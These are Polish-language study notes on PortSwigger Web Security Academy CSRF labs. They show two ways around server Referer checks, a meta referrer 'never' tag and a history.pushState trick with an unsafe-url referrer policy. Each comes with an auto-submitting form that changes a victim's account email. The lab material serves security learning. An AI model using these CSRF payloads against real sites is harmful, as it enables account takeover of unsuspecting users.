Przy prubie zlosliwego requestu jezeli dostaniemy zwrotke z servera:
""Invalid referer header""
To mozemy dolozyc znacznik html ("<meta name="referrer" content="never">")
(https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)

[Script]
<meta name="referrer" content="never">
<form method="POST" action="https://0a1c00b6030312f2c0b3135c008000ca.web-security-academy.net/my-account/change-email">
<input type="email" name="email" value="bambo@rambo.lambo">
</form>
<script>
document.forms[0].submit();
</script>

Jezeli jest taka sytuacja ze server sprawdza referrer to mozna tak:

[Header]
Referrer-Policy: unsafe-url

[Script]
<script>history.pushState('', '', '/?0a5a008d0424c054c06b7f7500e40067.web-security-academy.net')</script>
<form method="POST" action="https://0a5a008d0424c054c06b7f7500e40067.web-security-academy.net/my-account/change-email">
<input required type="email" name="email" value="rambo@bambo.lambo">
</form>
<script>
document.forms[0].submit();
</script>
